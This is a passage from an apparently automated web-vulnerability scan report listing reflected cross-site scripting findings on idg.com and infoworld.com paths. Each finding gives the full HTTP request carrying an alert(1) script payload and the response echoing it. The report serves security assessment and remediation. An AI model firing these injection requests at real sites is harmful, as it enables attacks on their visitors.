User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.idg.com/www/homenew.nsf/home?readform

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Mon, 19 Sep 2011 19:31:25 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5115
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /wwwf718a";be6d9bd42d1/homenew.nsf/request.js?OpenJavascriptLibrary");
} catch(err) {}</script>
...[SNIP]...

1.39. http://www.idg.com/www/homenew.nsf/request.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.idg.com
Path:   /www/homenew.nsf/request.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2051d"%3b8fc721c7a6b was submitted in the REST URL parameter 3. This input was echoed as 2051d";8fc721c7a6b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/homenew.nsf/request.js2051d"%3b8fc721c7a6b?OpenJavascriptLibrary HTTP/1.1
Host: www.idg.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.idg.com/www/homenew.nsf/home?readform

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Mon, 19 Sep 2011 19:31:26 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5115
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/homenew.nsf/request.js2051d";8fc721c7a6b?OpenJavascriptLibrary");
} catch(err) {}</script>
...[SNIP]...

1.40. http://www.infoworld.com/modules/DCP/contrib/views/css/views.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.infoworld.com
Path:   /modules/DCP/contrib/views/css/views.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b8d65"><script>alert(1)</script>e66e53a6871 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modulesb8d65"><script>alert(1)</script>e66e53a6871/DCP/contrib/views/css/views.css?Q HTTP/1.1
Host: www.infoworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.infoworld.com/

Response

HTTP/1.1 404 Not Found
Date: Mon, 19 Sep 2011 19:31:03 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.8
X-Drupal-Cache: MISS
Last-Modified: Mon, 19 Sep 2011 19:31:03 +0000
Cache-Control: public, max-age=0, public, max-age=600
ETag: "1316460663-0"
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
nnCoection: close
Content-Type: text/html; charset=utf-8
Content-Length: 51153

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
   <head>
<m
...[SNIP]...
<a href="/user?destination=modulesb8d65"><script>alert(1)</script>e66e53a6871/DCP/contrib/views/css/views.css&Q">
...[SNIP]...

1.41. http://www.infoworld.com/modules/DCP/contrib/views/css/views.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.infoworld.com
Path:   /modules/DCP/contrib/views/css/views.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b146e"><script>alert(1)</script>db7b4930dde was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules/DCPb146e"><script>alert(1)</script>db7b4930dde/contrib/views/css/views.css?Q HTTP/1.1
Host: www.infoworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.infoworld.com/

Response

HTTP/1.1 404 Not Found
Date: Mon, 19 Sep 2011 19:31:05 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.8
X-Drupal-Cache: MISS
Last-Modified: Mon, 19 Sep 2011 19:31:05 +0000
Cache-Control: public, max-age=0, public, max-age=600
ETag: "1316460665-0"
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
nnCoection: close
Content-Type: text/html; charset=utf-8
Content-Length: 51153

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
   <head>
<m
...[SNIP]...
<a href="/user?destination=modules/DCPb146e"><script>alert(1)</script>db7b4930dde/contrib/views/css/views.css&Q">
...[SNIP]...

1.42. http://www.infoworld.com/modules/DCP/contrib/views/css/views.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.infoworld.com
Path:   /modules/DCP/contrib/views/css/views.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f742c"><script>alert(1)</script>b10b4045bbc was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules/DCP/contribf742c"><script>alert(1)</script>b10b4045bbc/views/css/views.css?Q HTTP/1.1
Host: www.infoworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.infoworld.com/

Response

HTTP/1.1 404 Not Found
Date: Mon, 19 Sep 2011 19:31:07 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.8
X-Drupal-Cache: MISS
Last-Modified: Mon, 19 Sep 2011 19:31:07 +0000
Cache-Control: public, max-age=0, public, max-age=600
ETag: "1316460667-0"
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
nnCoection: close
Content-Type: text/html; charset=utf-8
Content-Length: 51153

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
   <head>
<m
...[SNIP]...
<a href="/user?destination=modules/DCP/contribf742c"><script>alert(1)</script>b10b4045bbc/views/css/views.css&Q">
...[SNIP]...

1.43. http://www.infoworld.com/modules/DCP/contrib/views/css/views.css [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.infoworld.com
Path:   /modules/DCP/contrib/views/css/views.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 129df"><script>alert(1)</script>f2de06625c9 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules/DCP/contrib/views129df"><script>alert(1)</script>f2de06625c9/css/views.css?Q HTTP/1.1
Host: www.infoworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.infoworld.com/

Response

HTTP/1.1 404 Not Found
Date: Mon, 19 Sep 2011 19:31:09 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.8
X-Drupal-Cache: MISS
Last-Modified: Mon, 19 Sep 2011 19:31:09 +0000
Cache-Control: public, max-age=0, public, max-age=600
ETag: "1316460669-0"
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
nnCoection: close
Content-Type: text/html; charset=utf-8
Content-Length: 51153

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
   <head>
<m
...[SNIP]...
<a href="/user?destination=modules/DCP/contrib/views129df"><script>alert(1)</script>f2de06625c9/css/views.css&Q">
...[SNIP]...

1.44. http://www.infoworld.com/modules/DCP/contrib/views/css/views.css [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.infoworld.com
Path:   /modules/DCP/contrib/views/css/views.css

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dfc32"><script>alert(1)</script>7e52655dc92 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules/DCP/contrib/views/cssdfc32"><script>alert(1)</script>7e52655dc92/views.css?Q HTTP/1.1
Host: www.infoworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.infoworld.com/

Response

HTTP/1.1 404 Not Found
Date: Mon, 19 Sep 2011 19:31:11 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.8
X-Drupal-Cache: MISS
Last-Modified: Mon, 19 Sep 2011 19:31:11 +0000
Cache-Control: public, max-age=0, public, max-age=600
ETag: "1316460671-0"
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
nnCoection: close
Content-Type: text/html; charset=utf-8
Content-Length: 51153

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
   <head>
<m
...[SNIP]...
<a href="/user?destination=modules/DCP/contrib/views/cssdfc32"><script>alert(1)</script>7e52655dc92/views.css&Q">
...[SNIP]...

1.45. http://www.infoworld.com/modules/DCP/contrib/views/css/views.css [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.infoworld.com
Path:   /modules/DCP/contrib/views/css/views.css

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 376e6"><script>alert(1)</script>9489cdc8335 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules/DCP/contrib/views/css/views.css376e6"><script>alert(1)</script>9489cdc8335?Q HTTP/1.1
Host: www.infoworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.infoworld.com/

Response

HTTP/1.1 404 Not Found
Date: Mon, 19 Sep 2011 19:31:13 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.8
X-Drupal-Cache: MISS
Last-Modified: Mon, 19 Sep 2011 19:31:13 +0000
Cache-Control: public, max-age=0, public, max-age=600
ETag: "1316460673-0"
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
nnCoection: close
Content-Type: text/html; charset=utf-8
Content-Length: 51153

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
   <head>
<m
...[SNIP]...
<a href="/user?destination=modules/DCP/contrib/views/css/views.css376e6"><script>alert(1)</script>9489cdc8335&Q">
...[SNIP]...

1.46. http://www.infoworld.com/modules/DCP/custom/demandbase/demandbase.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.infoworld.com
Path:   /modules/DCP/custom/demandbase/demandbase.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4b128"><script>alert(1)</script>c7f9dc1503f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules4b128"><script>alert(1)</script>c7f9dc1503f/DCP/custom/demandbase/demandbase.js?132 HTTP/1.1
Host: www.infoworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.infoworld.com/

Response

HTTP/1.1 404 Not Found
Date: Mon, 19 Sep 2011 19:31:00 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.8
X-Drupal-Cache: MISS
Last-Modified: Mon, 19 Sep 2011 19:31:00 +0000
Cache-Control: public, max-age=0, public, max-age=600
ETag: "1316460660-0"
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
nnCoection: close
Content-Type: text/html; charset=utf-8
Content-Length: 51159

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
   <head>
<m
...[SNIP]...
<a href="/user?destination=modules4b128"><script>alert(1)</script>c7f9dc1503f/DCP/custom/demandbase/demandbase.js&132">
...[SNIP]...

1.47. http://www.infoworld.com/modules/DCP/custom/demandbase/demandbase.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.infoworld.com
Path:   /modules/DCP/custom/demandbase/demandbase.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ba16d"><script>alert(1)</script>cfdd9489f78 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules/DCPba16d"><script>alert(1)</script>cfdd9489f78/custom/demandbase/demandbase.js?132 HTTP/1.1
Host: www.infoworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.infoworld.com/

Response

HTTP/1.1 404 Not Found
Date: Mon, 19 Sep 2011 19:31:03 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.8
X-Drupal-Cache: MISS
Last-Modified: Mon, 19 Sep 2011 19:31:03 +0000
Cache-Control: public, max-age=0, public, max-age=600
ETag: "1316460663-0"
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
nnCoection: close
Content-Type: text/html; charset=utf-8
Content-Length: 51159

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
   <head>
<m
...[SNIP]...
<a href="/user?destination=modules/DCPba16d"><script>alert(1)</script>cfdd9489f78/custom/demandbase/demandbase.js&132">
...[SNIP]...

1.48. http://www.infoworld.com/modules/DCP/custom/demandbase/demandbase.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.infoworld.com
Path:   /modules/DCP/custom/demandbase/demandbase.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d3c61"><script>alert(1)</script>a556d1d9c87 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules/DCP/customd3c61"><script>alert(1)</script>a556d1d9c87/demandbase/demandbase.js?132 HTTP/1.1
Host: www.infoworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.infoworld.com/

Response

HTTP/1.1 404 Not Found
Date: Mon, 19 Sep 2011 19:31:05 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.8
X-Drupal-Cache: MISS
Last-Modified: Mon, 19 Sep 2011 19:31:05 +0000
Cache-Control: public, max-age=0, public, max-age=600
ETag: "1316460665-0"
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
nnCoection: close
Content-Type: text/html; charset=utf-8
Content-Length: 51159

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
   <head>
<m
...[SNIP]...
<a href="/user?destination=modules/DCP/customd3c61"><script>alert(1)</script>a556d1d9c87/demandbase/demandbase.js&132">
...[SNIP]...

1.49. http://www.infoworld.com/modules/DCP/custom/demandbase/demandbase.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.infoworld.com
Path:   /modules/DCP/custom/demandbase/demandbase.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3a155"><script>alert(1)</script>eb65bbe82e5 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules/DCP/custom/demandbase3a155"><script>alert(1)</script>eb65bbe82e5/demandbase.js?132 HTTP/1.1
Host: www.infoworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.infoworld.com/

Response

HTTP/1.1 404 Not Found
Date: Mon, 19 Sep 2011 19:31:07 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.8
X-Drupal-Cache: MISS
Last-Modified: Mon, 19 Sep 2011 19:31:07 +0000
Cache-Control: public, max-age=0, public, max-age=600
ETag: "1316460667-0"
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
nnCoection: close
Content-Type: text/html; charset=utf-8
Content-Length: 51159

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
   <head>
<m
...[SNIP]...
<a href="/user?destination=modules/DCP/custom/demandbase3a155"><script>alert(1)</script>eb65bbe82e5/demandbase.js&132">
...[SNIP]...

1.50. http://www.infoworld.com/modules/DCP/custom/demandbase/demandbase.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.infoworld.com
Path:   /modules/DCP/custom/demandbase/demandbase.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 779d8"><script>alert(1)</script>3ad57dedbbc was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules/DCP/custom/demandbase/demandbase.js779d8"><script>alert(1)</script>3ad57dedbbc?132 HTTP/1.1
Host: www.infoworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.infoworld.com/

Response

HTTP/1.1 404 Not Found
Date: Mon, 19 Sep 2011 19:31:09 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.8
X-Drupal-Cache: MISS
Last-Modified: Mon, 19 Sep 2011 19:31:09 +0000
Cache-Control: public, max-age=0, public, max-age=600
ETag: "1316460669-0"
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
nnCoection: close
Content-Type: text/html; charset=utf-8
Content-Length: 51159

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
   <head>
<m
...[SNIP]...
<a href="/user?destination=modules/DCP/custom/demandbase/demandbase.js779d8"><script>alert(1)</script>3ad57dedbbc&132">
...[SNIP]...

1.51. http://www.infoworld.com/modules/DCP/custom/doubleclick_ads/doubleclick_ads.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.infoworld.com
Path:   /modules/DCP/custom/doubleclick_ads/doubleclick_ads.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d8b8f"><script>alert(1)</script>ec357874c66 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modulesd8b8f"><script>alert(1)</script>ec357874c66/DCP/custom/doubleclick_ads/doubleclick_ads.js?2531 HTTP/1.1
Host: www.infoworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.infoworld.com/

Response

HTTP/1.1 404 Not Found
Date: Mon, 19 Sep 2011 19:31:00 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.8
X-Drupal-Cache: MISS
Last-Modified: Mon, 19 Sep 2011 19:31:00 +0000
Cache-Control: public, max-age=0, public, max-age=600
ETag: "1316460660-0"
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
nnCoection: close
Content-Type: text/html; charset=utf-8
Content-Length: 51170

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
   <head>
<m
...[SNIP]...
<a href="/user?destination=modulesd8b8f"><script>alert(1)</script>ec357874c66/DCP/custom/doubleclick_ads/doubleclick_ads.js&2531">
...[SNIP]...

1.52. http://www.infoworld.com/modules/DCP/custom/doubleclick_ads/doubleclick_ads.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.infoworld.com
Path:   /modules/DCP/custom/doubleclick_ads/doubleclick_ads.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 31fe2"><script>alert(1)</script>66a7ec37ca7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules/DCP31fe2"><script>alert(1)</script>66a7ec37ca7/custom/doubleclick_ads/doubleclick_ads.js?2531 HTTP/1.1
Host: www.infoworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.infoworld.com/

Response

HTTP/1.1 404 Not Found
Date: Mon, 19 Sep 2011 19:31:03 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.8
X-Drupal-Cache: MISS
Last-Modified: Mon, 19 Sep 2011 19:31:03 +0000
Cache-Control: public, max-age=0, public, max-age=600
ETag: "1316460663-0"
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
nnCoection: close
Content-Type: text/html; charset=utf-8
Content-Length: 51170

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
   <head>
<m
...[SNIP]...
<a href="/user?destination=modules/DCP31fe2"><script>alert(1)</script>66a7ec37ca7/custom/doubleclick_ads/doubleclick_ads.js&2531">
...[SNIP]...

1.53. http://www.infoworld.com/modules/DCP/custom/doubleclick_ads/doubleclick_ads.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.infoworld.com
Path:   /modules/DCP/custom/doubleclick_ads/doubleclick_ads.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f7aa2"><script>alert(1)</script>68e85f8ac10 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules/DCP/customf7aa2"><script>alert(1)</script>68e85f8ac10/doubleclick_ads/doubleclick_ads.js?2531 HTTP/1.1
Host: www.infoworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
